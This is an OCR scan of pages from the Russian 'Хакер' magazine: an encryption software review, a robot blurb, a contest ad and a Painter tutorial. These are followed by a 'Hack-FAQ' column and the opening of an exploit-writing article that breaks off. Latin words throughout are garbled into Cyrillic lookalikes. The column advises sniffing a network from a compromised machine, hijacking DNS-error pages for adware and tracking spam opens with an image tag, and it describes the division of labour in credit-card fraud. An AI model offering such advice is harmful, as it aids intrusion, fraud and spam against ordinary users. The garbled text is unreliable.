тейнеры для хранения данных, она 
шифрует винт полностью на самом 
низком уровне! А это позволяет 
скрыть не только важные данные, но 
и все остальное содержимое диска 
или раздела, включая операционную 
систему. Пароль запрашивается во 
время загрузки компьютера, при этом 
у пользователя есть несколько попы- 
ток для ввода. Если система поймет, 
что имеет дело с посторонним чело- 
веком (несколько раз был введен 
неправильный пароль), то она вполне 
может загрузить ложную систему, при 
работе с которой будут уничтожаться 
данные основной системы. Маразма- 
тично, но попробовать стоит. 

Вердикт: шароварность программы 
— главный ее минус. Пару лет назад в 
Сети активно распространялся слух о 
том, что в программе установлен тро- 
ян для спецслужб. Разработчики, ес- 
тественно, этот факт отрицали, но ве- 
рить им наверняка нельзя, так как ис- 
ходники программы никто и никогда 
не изучал, кроме них. Более того, 
программа достаточно хорошо защи- 
щена от взлома. Добротной ключи- 
дел ки не найти, поэтому приходится 
искать пропатченные экзешники, ко- 
торые также могут содержать много 
нехороших вещей. А в целом прог- 
рамма стоящая и имеет несколько 
уникальных фишек (например, созда- 
ние временных ключей). 



РПІѴЕСПѴРТ 4.2 



ѴѴѴѴѴѴ.ЗЕСиВЗТАР.СОМ 
3,05 МБ, ЗНАВЕѴѴАВЕ 



Естественно, криптографических системы не дают 100% га- 
рантии конфиденциальности данных. РІапример, ты можешь 
попросту забыть отключить зашифрованный контейнер от 
системы и отлучиться от компа. Сам понимаешь, что в этом 
случае скопировать файлы сможет любой желающий. 



И все-таки не использовать одну из этих программ, особенно 
когда имеешь дело с компрометирующими данными и утили- 
тами, — глупо. Так что не делай глупости. :) 

ВШАКѴ ѴОІЖ’8 ІКІ 



ВСЕ 

В ТВОИХ 
РУКАХ 




В Интернете немало слухов о том, что любой контейнер легко 
взламывается спецслужбами. Верить в это или нет - личное дело 
каждого. Я не верю, но мне и скрывать нечего :). 




Если надумаешь шифровать целый раздел, то позаботься о 
бэкапе хранимых на нем данных. Например. ТгиеСгѵрІ с чистой 
совестью сотрет на нем все Файлы, перезаписав их случайными 
комбинациями символов. И будет прав. 
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Азіто 

Робот Азіто был создан 5 лет назад компанией Нопба и с тех пор очень 
быстро развивается. Сегодня он весит 54 килограмма, а росточком не 
выше среднего китайца: 130 сантиметров. По натуре робот очень доб- 
рожелательный: он умеет узнавать знакомых ему людей и приветство- 
вать их. Если надо, робот может нежно взять человека за руку и прогу- 
ляться рядом с ним. 

Если махнуть ему в сторону кофеварки, Азіто с удовольствием сгоняет 
за кофе и может даже прикатить целую тележку с едой, а потом и под- 
держать разговор, рассказав о превратностях погоды. Два таких робо- 
та могут запросто сыграть в футбол и управиться с пылесосом. 

Нопсіа не тешит себя надеждами окупить в ближайшее время расходы 
на создание робота. Пока Азіто можно только взять в аренду: за $160к 
в год этот красавец как следует развлечет работников фирмы и клиен- 
тов. Нопсіа использует его для продвижения своего бренда и автомоби- 
лей, в ІВМ он работает секретарем. Лет через пять планируется, что та- 
кие роботы смогут работать прислугой в обыкновенных домах. 





• Вес: 54 килограмма 

• Рост: 130 сантиметров 

• Бегает со скоростью 6 км/час 

• Прогулочная скорость: 2,7 км/час 

• Может носиться по кругу радиусом 2,5 метра со скоростью 5 км/час 
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Мощная система с неординарным, 
красивым звучанием. Отсутствие защитных 
сеток улучшает воспроизведение высоких 
частот. Динамики на специальном гибком 
подвесе обеспечивают особенно 
качественный, быстрый бас. Отличная 
система для музыки, игр и кино. 



4 Разработанная для “зз^спользует 
серьезной М У ЗЫК ’ ни = і; бумажные 
традиционные ре и рекордно 

йИ н^кий^в классе уровень нелинейных 

искажении. . 



Мо Ыфик а ЦИЯкті 

^плекгоеаннаяТ 3 АѴЕ с ^0 

(ищ скор ее ѵ П ° л ° Чн ьіми 

ТЬІЛ °^«о* он 'Т°^ 

сп Сабв ѴФер 0м ®* е ; е ам °^ь, м * 
^ аВЛя ^яс киноэ ; ь ;°Рошо 



У ТЕБЯ ЕСТЬ ВОЗМОЖНОСТЬ ВЫИГРАТЬ КЛАССНЫЕ КОЛОНКИ ОТ АѴЕ! ТЕБЕ НЕ НАДО 
НИКУДА ЕХАТЬ, НЕ НАДО ПРИДУМЫВАТЬ ВЕЛОСИПЕД. ПРОСТО ОТВЕТЬ НА НЕСКОЛЬКО 
ВОПРОСОВ И ПЕРВЫЕ ТРОЕ САМЫХ БЫСТРЫХ ПОЛУЧАТ ПРИЗ: 



КТО СТОЯЛ У ИСТОКА СОЗДАНИЯ 
ПЕРВОГО ДИНАМИКА В МИРЕ? 

1) Зепзеп 

2) АѴЕ 

3) сооІЗоипсІ 

4) тісгоІаЬ 

ЧТО ТАКОЕ ДЕЦИБЕЛ? 

1 ) Что-то очень сложное 

2) Относительная логарифмическая 
единица измерения величин, 
связанных с интенсивностью звука 

3) Качество звука 

* ПРИСЫЛАЙ ОТВЕТЫ НА ВОПРОСЫ ПО АДРЕ' 



ЧТО ТАКОЕ САБВУФЕР? 

1) Источник низкочастотного звука 

2) Источник радиосигнала 

3) Звуковой проигрыватель 

САМЫЙ ПОПУЛЯРНЫЙ ФОРМАТ 
ФАЙЛА ДЛЯ ХРАНЕНИЯ 
МУЗЫКАЛЬНЫХ КОМПОЗИЦИЙ? 

1 ) ѴѴАѴ 

2) 000 

3) МРЗ 

4) ѴѴМА 



\ѴЕ@ВЕАІ_.ХАКЕР.Ви 




ДИЗАИН 
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ТЕХТ ОЛЕГ ТИЩЕНКОВ / НПр^/оІедІі.сіезідп.ги / 

Иллюстратор студии Лебедева 



РИСУЕМ В РАІІЧТЕН IX 



ііЭТОТ РАССКАЗ О ЕДИНСТВЕННОМ ПРОФЕССИОНАЛЬНОМ ИНСТРУМЕНТЕ ДЛЯ 
ЦИФРОВЫХ ХУДОЖНИКОВ. В ОТЛИЧИЕ ОТ ВСЕНАРОДНО ПРИЗНАННОГО ГРАФИЧЕС- 
КОГО РЕДАКТОРА АйОВЕ РНОТОЗНОР, КОТОРЫЙ ПРЕДНАЗНАЧЕН ДЛЯ ОБРАБОТКИ И 
КОЛЛАЖИРОВАНИЯ ИЗОБРАЖЕНИЙ, РАІІЧТЕР В ПЕРВУЮ ОЧЕРЕДЬ ИСПОЛЬЗУЕТСЯ 
ДЛЯ СОЗДАНИЯ ИЗОБРАЖЕНИЙ «С НУЛЯ». ПРИ ЭТОМ ОН НАДЕЛЕН ПРАКТИЧЕСКИ 
ВСЕМИ ФУНКЦИЯМИ ОБРАБОТКИ, КОТОРЫМИ ОБЛАДАЕТ РЕДАКТОР РНОТОЗНОРР * 



Сразу хотелось бы уточнить, что никто не ставит себе целью вы- 
яснить, какая из программ лучше, позволив читателям самостоя- 
тельно сопоставить эти пакеты, объективно оценив возможности 
Раіпіег’а и РИоіозИор’а для выполнения различных задач. Однако 
для того чтобы составить собственное мнение, недостаточно про- 
читать эту статью или даже заучить ее самые интересные момен- 
ты наизусть. Для того чтобы мнение было по-настоящему объек- 
тивным, Раіпіег необходимо «подержать» в руках. 

Для начала можно ограничиться ІгіаІ-версией, скачав ее с сайта 
ѵѵѵѵѵѵ.согеі.сот . Если в наличии имеется графический планшет 



ѴѴасот ІпШоз, то дело обстоит еще проще: вероятность найти об- 
легченную версию Раіпіег на прилагающихся к нему компакт-дис- 
ках очень велика. 

Кстати, раз уж речь зашла о планшетах, стоит сразу сказать, что 
без графического планшета открывать Раіпіег практически не име- 
ет смысла, поскольку при работе обыкновенной мышью теряется 
80% возможностей, функциональности и удобства этого пакета. 

В этом уроке мы рассмотрим процесс рисования картинки в сти- 
ле Оагк Рапіазу, комментируя некоторые из возможностей и осо- 
бенностей программы Раіпіег. вшакѵ ѵоіж’8 т 



ХАКЕР 01 /85/ 06 



043 



ДИЗАЙН ///// І531ІЕ 




Многие цифровые художники давно отка- 
зались от традиционных средств 
изображения, они сразу начинают рисо- 
вать эскизы на компьютере. Мне же инте- 
реснее и удобнее начинать с карандаша и 
бумаги, после чего сканировать изображе- 
ние. На диске скан моего рисунка называ- 
ется Оі.ірд, его мы открываем в Раіпіег. 




02 РАЗМЕРЫ/ФОРМАТЫ 

Увеличиваем или уменьшаем картинку до необходимого нам размера. Как правило, я работаю 
«с запасом»: рабочее изображение специально увеличиваю на 20 — 30%, чтобы четче прора- 
батывать детали. Сохраним файл в формате РЗЭ. 

Необходимо отдавать себе отчет в том, что далеко не на всех компьютерах стоит Раіпіег, и 
поэтому собственный формат программы РІРР можно будет открыть не на всех машинах. 
Также совместимость формата РЗЭ позволит сохранить группы и названия слоев. Прав- 
да, будем готовы к тому, что некоторые специфические особенности слоев Раіпіег 
не всегда будут интерпретироваться другими программами корректно. 




Как это часто бывает, отсканированный скетч при увеличении кажется еще менее совершенным, чем он 
был на бумаге, поэтому первым делом проработаем детали рисунка Тем более что в голове уже появля- 
ются новые идеи, которые так и просятся на л ист. Работать будем инструментом Эопз Магкег. 



Следующий шаг — выбор цветового решения. Этот рису- 
нок я хотел выполнить в достаточно сдержанной цветовой 
гамме, так как простое «разукрашивание» не принесло 
бы желаемых результатов. 




05 ПАЛИТРА МІХЕВ 

Я изначально не собирался работать только 
в теплых серых тонах. Соответственно, на па- 
литру Міхег я вынес несколько ключевых цветов. 
На ней можно смешивать выбранные краски, 
добиваясь необходимых холодных и теплых от- 
тенков, как это делают обыкновенные художни- 
ки на своих палитрах. 

Те, кому приходилось достигать подобного эф- 
фекта другими цифровыми средствами, наверня- 
ка оценят удобство палитры Міхег по достоинству. 




06 РАБОЧЕЕ ПРОСТРАНСТВО 

Как правило, при работе с большими изображениями на ограниченном пространстве 
монитора постепенно начинает мешать все! В том числе даже очень нужные палитры. 
Однако для разрешения этой трудности достаточно выбрать необходимый инструмент 
и присвоить любой кнопке на планшете свойства ТаЬ (ѴѴіпсІоѵѵ > ЗІіоѵѵ/НісІе Раіеііез). 
Впрочем, при отсутствии планшета для достижения того же самого эффекта можно 
нажимать клавишу <ТаЬ> на клавиатуре. 



СОЗДАНИЕ СОБСТВЕННОЙ БИБЛИОТЕКИ ТЕКСТУР 

Очень часто при работе с «рыхлыми» материалами (типа мела или пастели) для воплощения творческого замысла требуются особенные 
текстуры бумаги. У Раіпіег’а имеется собственный комплект текстур, но иногда бывают ситуации, когда текстуры, имеющиеся в стандартном 
наборе, не подходят. В таком случае всегда остается возможность создать собственную текстуру из фотографии либо нарисовать ее самос- 
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07 ИНСТРУМЕНТЫ 

В арсенале Раіпіег имеется в общей сложности около 200 разных настроек инструментов, и было 
бы нелепо предположить, что пользователь каждый раз при смене инструмента будет держать в го- 
лове, где находятся все остальные, с которыми он работает над данной работой. 

Для того чтобы нужные инструменты были всегда под рукой, достаточно подцепить уже настроен- 
ный инструмент мышью и перетащить его на рабочее поле: на экране тут же появится палитра изб- 
ранных инструментов Сизіот РаІеНе. В дальнейшем в нее можно добавлять новые инструменты. 
Исходя из собственного опыта, могу сказать, что удобнее всего иметь сразу несколько таких палитр 
для разных техник рисования. 




Следующим этапом будет закрашивание объек- 
тов цветом. При этом необходимо учитывать об- 
щую освещенность сцены и направление паде- 
ния света. Это важно для создания правдопо- 
добных бликов и теней. 




09 РАСТУШЕВКА 

Растушевкой называется процесс смешивания соседних на рисунке цветов. Если правиль- 
но представлять себе объем рисуемых объектов, то таким нехитрым способом можно эф- 
фективно достичь реалистичности в передаче форм. Для этого приема в инструментарии 
Раіпіег имеется целый ряд средств. Однако приходится признать, что качество встроенных 
инструментов не всегда соответствует тому, которое хотелось бы видеть в своей работе. 




11 И СНОВА РАСТУШЕВКА 

Как правило, одного прохода инструментом ВІепбег 
бывает недостаточно, реже можно обойтись двумя, 
но чаще их требуется больше. 

С каждым разом мы работаем с инструментом все 
меньшего и меньшего диаметра. 




10 СОЗДАНИЕ 

И РЕДАКТИРОВАНИЕ КИСТЕЙ 

Выбираем ѴѴіпсІоѵѵ > ЗІіоѵѵ Вгизіі Сгеаіог, чтобы отк- 
рыть палитру создания кистей. Неискушенному 
пользователю количество настроек кисти, навер- 
няка покажется пугающим и сложным. 




Когда объект более-менее обрел цвет и форму, пришла пора заняться мелкими деталями. 
Мне удобнее всего это делать с помощью инструмента ОідііаІ АігЬгизІі. 



тоятельно. Далее все очень просто. Подготовив текстуру (она должна быть черно-белой), скопируем ее в буфер обмена, а за- 
тем, открыв палитру текстур Раіпіег’а, выбираем ѴѴіпсІоѵѵз > ИЬгагу РаІеПез > ЗІіоѵѵ Рарегз. Нажав на треугольник, выбираем из 
меню Саріиге Рарег. Таким образом, мы получаем собственную текстуру, которую можем использовать так же, как и обычные. 
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Поскольку объектов на рисунке достаточно много, то все эти процедуры 
придется повторить столько раз, сколько этого требует рисунок. Учитываем 
и то, что важные в иллюстрации объекты требуют гораздо большего внима- 
ния и проработки деталей, чем, например, задний план. 




Среди прочих своих достоинств, Раіпіег имеет одну удивительную функ- 
цию, удобство которой опять-таки смогут оценить в первую очередь те, 
кто работает на графических планшетах. Это «вращение рабочего лис- 
та», при котором можно добиться такого наклона штриховки (или расту- 
шевки), который удобен руке или необходим для работы с той или иной 
плоскостью на рисунке. Для того чтобы развернуть лист, нужно выбрать 
инструмент Ноіаіе Раде (он находится на одной кнопке с инструментом 
ОгаЬЬег) или, удерживая комбинацию <АІі>+<Зрасе>, развернуть лист 
мышью. Искажения изображения при этом не происходит! 




15 ОТЕКСТУРИВАНИЕ 



16 МАСКИ 



Для придания картинке большей оригинальности и стилизованности попробуем наложить на нее 
фотогрфические текстуры. Например, сделаем так, чтобы поверхность аккордеона как будто бы 
шелушилась. Для этого найдем какой-нибудь объект, имеющий подходящую для нашей целей 
текстуру, и, сфотографировав его, перенесем ее в Раіпіег, выбрав подходящий тип наложения. 



При помощи масок скрываем лишние участки 
текстур. Работа с масками 
в Раіпіег аналогична работе с масками 
в РНоІозНор’е, поэтому не вызовет затруднений. 



АСТІ0І\ІЗ ИЛИ ЗСВІРТЗ? 

Несмотря на то, что в РНоІозІтор’е сценарии появились давно, по сути, они лишь отдаленно напо- 
минают то, что было создано производителями Раіпіег едва ли не в первой версии программы. 
Смысл Зсгіріз Раіпіег’а в том, что они могут зафиксировать весь процесс создания рисунка или ка- 
кого-то одного его фрагмента. В отличие от Ріпоіозітор’а, в Раіпіег’е всегда можно зафиксировать 
не только порядок действий и фильтров, но и траекторию кистей, процесс настройки цветовой 
палитры и все, что душе угодно! Этот мощный пакет особенно выгоден в процессе обучения. 




В 1 * II Ік 




РАБОТА С МАСКАМИ 

Для постоянных пользователей Рбоіозіпор’а работа с масками не должна вызывать больших затруд- 
нений. Но есть некоторые нюансы, которые отличают маски Раіпіег’а от хорошо известных масок 
в РТюІозТюр’е. Для того чтобы создать маску, нужно выбрать в меню іауегз > Сгеаіе І-ауег Мазк или 
кликнуть на самую правую кнопку внизу палитры іауегз. Принцип работы с масками аналогичен ра- 
боте с масками в РТюІозТюр’е. Для того чтобы перейти в режим работы с маской, нужно просто по 
ней кликнуть на палитру іауегз. Если хочется увидеть содержимое маски, то достаточно развернуть 
палитру Сііаппеіз. 
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17 ПЯТНА 



В связи с тем, что в основном работа происходит не с полным изображением, а его 
фрагментами, то иногда между отдельными его частями возникают несоответствия 
контрастов. От них можно избавиться при помощи инструментов Иосіде и Вит, затем- 
няя слишком светлые участки и высветляя темные. Если какие-то фрагменты на зад- 
нем плане «вываливаются» из всей композиции из-за обилия мелких деталей, то их 
можно немного размыть, используя инструмент ВІиг. 



ПО СТОПАМ ДОНА 
СИГМИЛЛЕРА 

Не так дано я прочитал 
книгу Дона Сигмиллера 
Оідііаі СТіагасІег Оезідп 
апсі Раіпііпд, в которой 
он рассказывал о сво- 
ей технике рисования. 
Наверняка те, кто учи- 
лись промышленному 
дизайну, знакомы с 
этой техникой в «не- 
компьютерном» вари- 
анте: в ее основе ле- 
жит использование ка- 
рандаша и растушев- 
ки. Дон Сигмиллер 
настроил несколько 
инструментов для ими- 
тации этой техники на 
компьютере. Вынуж- 
ден признать, что его 
способ рисования и 
созданные им инстру- 
менты мне показа- 
лись не очень удоб- 
ными. В этом уроке 
я расскажу о неко- 
торых основопола- 
гающих моментах 
этой техники, 
в основе которой 
также лежат 
растушеванные 
штрихи. 



НАСТРОЙКА 

КИСТЕЙ 

Настройка кистей 
в Раіпіег’е — это особый 
вид искусства. Во-первых, 
очень много параметров 
кисти находится в палитре 
свойств инструмента, 
Ргорегіу Ваг. Там можно 
настроить размер кисти, 
ее прозрачность и прочее. 
Так же существует утили- 
та, с помощью которой 
можно редактировать име- 
ющиеся кисти и создавать 
собственные, соответству- 
ющие исключительно авто- 
рскому замыслу. Причем 
количество параметров и 
настроек этих кистей начи- 
нающего пользователя мо- 
жет немного шокировать. 







ВЗЛОМ ///// І531ІЕ 



НАСК-РАѲ 



БУДЬ КОНКРЕТНЫМ И ЗАДАВАЙ КОНКРЕТНЫЕ ВОПРОСЫ! 
СТАРАЙСЯ ОФОРМИТЬ СВОЮ ПРОБЛЕМУ МАКСИМАЛЬНО 
ДЕТАЛЬНО ПЕРЕД ПОСЫЛКОЙ В НАСК-РАО. ТОЛЬКО ТАК 
Я СМОГУ ДЕЙСТВИТЕЛЬНО ПОМОЧЬ ТЕБЕ ОТВЕТОМ, УКА- 
ЗАТЬ НА ВОЗМОЖНЫЕ ОШИБКИ. ОСТЕРЕГАЙСЯ ОБЩИХ 
ВОПРОСОВ ВРОДЕ «КАК ВЗЛОМАТЬ ИНТЕРНЕТ?», ТЫ 
ЛИШЬ ПОТРАТИШЬ МОЙ И СВОЙ ПОЧТОВЫЙ ТРАФИК. 
ТРЯСТИ ИЗ МЕНЯ ФРИШКИ (ИНЕТ, ШЕЛЛЫ, КАРТЫ) — 
НЕ СТОИТ, Я САМ ЖИВУ НА ГУМАНИТАРНУЮ ПОМОЩЬ! 



Ііаск_РАО соплтепіз: 



ЗЮЕХ: 




О: У меня есть доступ к одному из компов удаленной 
сети (сеть антикварная и админ — лох). Как мне сни- 
фать всю сетку разом с захваченной машины? 

А: Твой вопрос подойдет как иллюстрация вводного 
слова в начале рубрики: «будь конкретным»! Что та- 
кое «антикварная» сеть? Это там, где нет сервака 
Сгау XI, или там, где все крутится под І\ІТ 3.51? Поз- 
волю расшифровать слово за тебя и скажу, что твоя 
сеть до сих пор стоит на хабах, не свитчах. Это об- 
легчит мою задачу ответчика. Простейший роогзпіЯег 
или Тбе ОоЬЫег прошерстит весь поток инфы и сло- 
жит в аккуратненький лог-файл на захваченной ма- 
шине. Я не буду вопрошать, насколько админ лох, 
так как в крайности подобного проявления разумный 
взломщик смог бы и всю сеть положить на лопатки... 
В будущем давай описания по делу, без эмоций. 

О: Тут прочитал недавно модного Дэвида Брауна «Циф- 
ровую крепость». Реально вообще создать тот мощнец- 
кий комп из книжки с 3 миллионами процессоров? 

А: Вопрос обсуждался и прежде, но российское из- 
дание книги относительно свежо, поэтому позволю 
повториться. Различие между писателями-сказочни- 
ками и авторами X: первые пишут сказки, а мы сказ- 
ку делаем былью! Однако здесь даже мы бессильны, 
потому что за 9 лет, прошедших с момента выхода 
оригинала книги (Эідііаі ЕоіТгезз), подобного компа не 
появилось. Хотя надо заметить, что Іпіеі в настоящий 
момент вкладывает большие деньги в разработку 
многоядерных процессоров и именно в этом видит 
перспективы глобального роста производительности 
камней. Так что кто знает, может, через несколько 
лет такие системы станут и в самом деле доступными. 

О: Пишем навороченный асіѵѵаге, но до сих пор не 
догнали, как вставить нашу страничку при бпз-ошиб- 
ках, когда юзер лезет на несуществующий сервер? 

А: Впервые познакомился с темой после установки 
очередного ІСО-плугина. Тщательное изучение сис- 
темы привело к файлу зіісіосіс.сііі в системной папке, 
который подменяется для последующего выведения 
нужного рекламщику сообщения. Следует отметить, 
что каждый первый зруѵѵаге/абѵѵаге-сканер (вроде 
Аб-аѵѵаге) постоянно наблюдает за обозначенным 
файлом, а в случае попытки подмены оповещает 
юзера и возвращает все на прежние позиции. Подоб- 
ные вопросы — мой хлеб, но при профессиональном 
подходе к созданию подобных варез-шедевров луч- 
ше обкатывать уже существующих паразитов на 
собственной машине, чтобы выявить внедренные из- 
менения и способы их внедрения. 

О: Качаю варез в режиме поп зіор, но в р2р постоян- 
но натыкаюсь на всякую левоту вместо желанных 
сладостей! Как объехать эти подставы? 

А: Помнишь пословицу «поспешишь — людей насме- 
шишь»? Здесь оно очень актуально. Перед скачивани- 
ем весомого пака (значит, затраты трафика и време- 
ни), разумно проверить, а вышел/планируется ли к вы- 
ходу подобный фильм/альбом/софт? Желание обрес- 
ти все самое свежее раньше всех остальных часто ка- 
рается впаркой рекламных порнофильмов вместо же- 
ланного контента. Неразумно обижаться на динамщи- 
ков, которые распространяют ѴѴіпбоѵѵз І_опдІіогп РіпаІ 
ЕсІШоп, потому что подобного релиза нет даже в самых 
элитных варез-архивах. Так же как не доступен Маігіх 
5: Еіасиіаііопз и Тегтіпаіог 6. Конечно, бывают крутей- 
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шие утечки, вроде украденного Иа\і І_йе 2 года на- 
зад, но об этом и так кричали все новостные лен- 
ты. Именно там, спросив у Гугла, можно прове- 
рить реальность добра из р2р. В 90% случаев 
можно полагаться и на комментарии юзеров, ко- 
торые, проявляя дообѵѵіІІ, оповещают коллег о 
подделках. Другое дело, что многие из юзеров 
недостаточно грамотны для вписки комментов на 
английском. Здесь можно и не мучиться с пере- 
водом, так как более половины негативных (крас- 
ных в еЮопкеу) ясно укажут на лажу. 

О: В чем разница между «вбивщиками» 
и «анальщиками»? Кому живется слаще? 

А: Если довериться твоему ошибочному написа- 
нию имен этих друзей, получается, что один ак- 
тивный, а другой пассивный гомосексуалист :). 
«Налыщик» или «обналыщик» — тот, кто перево- 
дит деньги, украденные с кредитных карт, во 
вполне осязаемые денежные единицы — кэш. 
Он может являться получателем денежного чека, 
который обращается в желанные единицы после 
визита в банк. Его риск — быть переваренным 
внутренними органами при соответствующем ви- 
зите. Часто это амплуа совмещается и с другим 
— дропа, то есть получателя товара, который 
был закуплен по СС. Вбивщик — тот славный 
господин (госпожа), который(ая) вводит данные 
о кредитных картах в формы разнообразных 
биллингов, банков и систем денежных перево- 
дов. В список его обязанностей может входить и 
поддержка переписки с «серверной стороной», 
когда могут возникнуть вопросы правооблада- 
ния использованной СС. Бывает и так, что расп- 
ределять подобные мошеннические обязаннос- 
ти не стоит, потому что каждое новое звено кри- 
минальной цепи — новый шанс попалиться. От- 
дельные творцы совмещают в себе разом все 
описанные выше «добродетели». 

О: Админю сетку и хочу выловить всех раскеі 
топкеуз локалки, заманив на Ііопеуроі. Однако 
под рукой нет ни одного дистриба ѴѴіпХР без 
вшитого ЗР2 :(. Как удалить этот пак из системы? 

А: Если есть система, куда ЗР2 ставился вруч- 
ную, то удалить добро можно будет через Зузіет 
Резіоге (восстановление системы), поставив да- 
ту «открутки» (гезіоге роіпі) — момент установки 
пака. Однако решение далеко от идеала, так как 
даже после ручной зачистки системы от всех на- 
ходившихся там документов и логов может ос- 
таться нечто, чем поживятся те самые топкеуз. 
Предполагается, что система должна быть 
девственно чистой и весь дополнительный кон- 
тент должен быть размещен намеренно (вероят- 
но, для проведения последующих провокаций 
против атакующих мартышек). Новую инсталля- 
цию ХР (ЗР2) можно будет «очистить» от ЗР че- 
рез с:\ѵѵіпсІоѵѵз\$МіЗегѵісеРаскІІпіпзІаІІ$\зрипіпз1:\ 
зрипіпзГехе. 

О: Как круче всего поиздеваться над забрав- 
шимся в мой Іпопеуроі поганцем? 

А: Расскажу о реальном случае, который устро- 
или мои приятели. Поставив незапароленного 
Расітіп'а (на изолированный, но выведенный в 
инет комп в сети банка), они стали ждать, рыба- 



чить на злостного хакера. Ждать долго не 
пришлось, на второй день в систему вписался 
«цифровой террорист». Для правильного 
«оформления» системы «мои документы» были 
наполнены левыми книгами бухгалтерской от- 
четности, выписками по счетам и описаниями 
проведенных транзакций. На самое же видное 
место был положен ярлык на документ-инструк- 
цию по обналичиванию Ы-ной суммы. Там были 
детально описаны шаги, включая необходимую 
авторизацию, явки и пароли. Юнец оказался 
храбр и уже на другой день попробовал сру- 
бить кэш, проведя серию звонков и предста- 
вившись «доверенным лицом». Для большей 
убедительности и создания иллюзии америка- 
нского банка, оперируемого лохами в Москве, 
телефон был оставлен в Нью-Йорке, откуда 
был настроен форвард на мобилу одного из 
разводящих админов. Те пригласили подъехать 
парня в офис, где того долго ждать не приш- 
лось. Появившись, был направлен на зесигііу- 
досмотр под предлогом «специального положе- 
ния финансового учреждения». Там беднягу 
раздели до трусов и объявили: «Вас снимает 
скрытая камера». Предложили уйти на фев- 
ральский мороз в еще наличествовавших тру- 
сах или дождаться приезда милиции в тепле. 
Юнец предпочел первое :). Если кто-то из чита- 
телей знаком с бедолагой, пожалуйста, напи- 
шите, постараюсь помочь с возвратом одежды. 

О: Меня ломает разбираться с мануалами, но 
хочу настроить файрвол в І_іпих, чтобы не пус- 
кал хакерюг на отдельные порты, чтобы туда 
только «свои» заползали! 

А: На самом деле, эта рубрика для тех, кто не 
нашел ответы в мануапах... мы не ханжи, и са- 
мим порой силы воли не хватает на ратные под- 
виги, поэтому поделюсь простым решением для 
ІРТАВБЕЗ. Строка «ірІаЫез -I ІЫРІІТ -і еІМ -р Іср 
--броіі служба -з 192.1 68. 0.хх -\ АССЕРТ», добав- 
ленная в конфиг, поможет закрыть доступ для 
«службы» всем извне и будет пускать со всех 
адресов локалки (192.1 68. 0.хх). Службой может 
быть любой предлагаемый сервис; у меня стоит 
подобная настройка на 83Н, через который му- 
тятся и остальные темы: почта, йр, пеѵѵз. 

О: Волею случая пользовался пару дней доисто- 
рическим ноутом на ѵѵіп 95, но меня там вышиба- 
ло каким-то пике'ом. Расскажи об этой атаке и 
чем-нибудь подобном против старых операцио- 
нок, которые еще вытягивает мой ноут! 

А: Прекращение поддержки старых версий 
софта безусловно разумно, но только лишь с 
тем условием, что девелоперы будут также пос- 
тавлять новое мощное железо для работы с 
последними версиями... Тем же, кому все еще 
приходится работать со старым добром, пред- 
писано познавать радости известные еще 8 лет 
назад более продвинутым коллегам. ІЧике — 
эксплуатация ошибки ѵѵіп95 в ЫеІВЮЗ-службе, 
которая обеспечивает «Общий доступ». Приняв 
ЫВ-пакет, заканчивающийся нулем, система 
уходит в коматоз и выбрасывает всем извест- 
ный «синий экран смерти». Существуют как от- 
дельные патчи, так и цельное МЗ-решение — 



ѴѴіп95 ЗЕ. Стоит отметить, что атаку против тебя 
провел скорее всего один из соседей по сети, 
так как 95-ых машин сейчас осталось довольно 
мало, и надо точно знать адрес данного рарите- 
та. Из схожих широко известных уязвимостей 
можно отметить ЮМР-атаку на ѵѵіп98. Наиболее 
известной реализацией был ѵоісіогег, написан- 
ный покойным Андреем Дюковым ( ѵѵѵѵѵѵ.ѵоіб.ги ). 

О: Заказчик спам-рассылки хочет платить толь- 
ко за количество приведенных посетителей и 
какую-то долю за тех, кто просто прочитали 
письмо. Как мы сможем разобрать, какие из по- 
сетителей мои, а какие его? 

А: Любой криминал, даже самый безобидный и 
компьютеризированный, требует взаимного до- 
верия между поделыщиками или, по крайней ме- 
ре, иллюзию оного. В этом способе, о котором я 
расскажу, подобное доверие требуется в отно- 
шение заказчика: насколько полно он будет счи- 
тать хосты, приведенные спамером. Идея заклю- 
чается в том, что линк на страничку заказчика бу- 
дет заключать ге^еггаі-номер (имя) спамера, так 
что при подсчете обращений будут высвечивать- 
ся именно хиты (хосты) конкретного спамера. 
Число прочитавших может быть выведено при 
работе с юзером на біті, поддерживающий е- 
таіі клиента, который сегодня наиболее распро- 
странен. Простым и элегантным решением ока- 
зывается включение ссылки на картинку <ітд 
згс=ІіНр://\ллллл/.хакер.ги/топі1огіпа/ЗратВесеіѵегЦ 
изЮатеІп.азр?зрат@зрат.ѵоиг.Ю Ьогбег=0 
\л/ісШг=1 беідІіІ=1>. Получатель открывает письмо 
и автоматически загружает указанную картинку. 
Теперь все зависит от заказчика, который дол- 
жен честно посчитать количество загрузок с его 
сайта. Спамер может, конечно, вести и свой па- 
раллельный подсчет, когда картинки будут гру- 
зиться и считаться прямо на его ресурсе. Тогда 
при параллельном подсчете не будет соблазна 
обмануть друг друга. 

О: Пишем софт по борьбе с СС-мошенничест- 
вом. Кого софтина должна оповещать о случив- 
шемся РОЗ-инциденте? 

А: Вопрос требует значительно более детально- 
го описания. Для остальных напомню, что РОЗ 
(Роіпі О? Заіе) — девайс для прокатки кредиток. 
Первым должен быть оповещен банк выдавший 
кредитную карту, а тот сможет связаться с дер- 
жателем карты. Потом идет банк, который вы- 
дал разрешение на использование РОЗ'а, по ко- 
торому прошла стремная транзакция (в том же 
банке обыкновенно открыт счет владельца 
РОЗ'а). Логичным будет оповещение админист- 
рации сети, в которой была проведена транзак- 
ция (обыкновенно связь осуществляется через 
отцовские структуры: МС/ЕС, ѴІЗА, АЕ-Сепіигіоп 
и т.д). Цена вопроса измеряется и законода- 
тельством отдельной страны, где система будет 
использована. База софта едина, дописывают- 
ся лишь новые части под конкретные нужды. 
В отдельных странах одновременно должны 
быть оповещена полиция и страховые компании, 
которые обслуживают банки сагсіііоісіег'а и вла- 
дельца РОЗ'а, бизнес самого владельца РОЗ'а. 

ВІЫАВУ ѴОІЖ’8 Т 
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ІІ НАЙТИ УЯЗВИМЫЙ СЕРВИС И ПРАВИЛЬНО ПО- 
ДОБРАТЬ ЭКСПЛОЙТ НЕЛЕГКО. И ВСЕ ЖЕ ЗНАЧИТЕЛЬ- 
НО СЛОЖНЕЕ НАПИСАТЬ ЭТОТ ЭКСПЛОЙТ САМОМУ, 
ПРЕВРАТИТЬ ТУСКЛУЮ НОВОСТЬ ИЗ БАГТРАКА В РЕ- 
АЛЬНО РАБОТАЮЩУЮ ОТМЫЧКУ. СЕГОДНЯ Я НЕ РАС- 
СКАЖУ ТЕБЕ О ТОМ, КАК НУЖНО ПИСАТЬ ЭКСПЛОЙ- 
